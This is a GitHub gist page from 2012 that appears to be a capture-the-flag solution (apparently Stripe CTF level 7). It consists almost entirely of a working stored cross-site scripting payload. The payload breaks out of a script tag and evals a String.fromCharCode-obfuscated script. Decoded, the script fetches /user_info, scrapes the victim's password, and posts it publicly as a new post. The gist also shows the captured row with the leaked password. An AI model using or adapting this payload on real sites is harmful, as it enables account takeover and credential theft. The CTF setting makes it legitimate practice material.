Skip to content

Instantly share code, notes, and snippets.

@ericbutera
Created September 27, 2012 15:58
Show Gist options
  • Save ericbutera/3794797 to your computer and use it in GitHub Desktop.
Save ericbutera/3794797 to your computer and use it in GitHub Desktop.
</script<script>eval(String.fromCharCode(36,46,103,101,116,40,39,47,117,115,101,114,95,105,110,102,111,39,44,32,102,117,110,99,116,105,111,110,40,100,97,116,97,41,123,13,10,118,97,114,32,105,110,102,111,68,111,109,32,61,32,36,40,100,97,116,97,41,59,13,10,118,97,114,32,112,119,32,61,32,36,40,34,46,116,97,98,108,101,45,99,111,110,100,101,110,115,101,100,32,116,114,58,110,116,104,45,99,104,105,108,100,40,50,41,32,116,100,34,44,32,105,110,102,111,68,111,109,41,46,116,101,120,116,40,41,59,13,10,36,40,34,35,116,105,116,108,101,34,41,46,118,97,108,40,34,108,111,108,119,117,116,34,41,59,13,10,112,119,32,61,32,101,115,99,97,112,101,40,112,119,41,59,13,10,36,40,34,35,99,111,110,116,101,110,116,34,41,46,118,97,108,40,112,119,41,59,13,10,118,97,114,32,112,97,114,97,109,115,32,61,32,36,40,34,35,110,101,119,95,112,111,115,116,34,41,46,115,101,114,105,97,108,105,122,101,40,41,59,13,10,36,46,112,111,115,116,40,34,47,97,106,97,120,47,112,111,115,116,115,34,44,32,112,97,114,97,109,115,41,59,13,10,125,41,59))</script>
|level07-password-holder|lolwut|dum%27my%22pas%60sword|2012-09-27
15:50:31.681444+0000
dum'my"pas`sword
$.get('/user_info', function(data){
var infoDom = $(data);
var pw = $(".table-condensed tr:nth-child(2) td", infoDom).text();
$("#title").val("lolwut");
pw = escape(pw);
$("#content").val(pw);
var params = $("#new_post").serialize();
$.post("/ajax/posts", params);
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment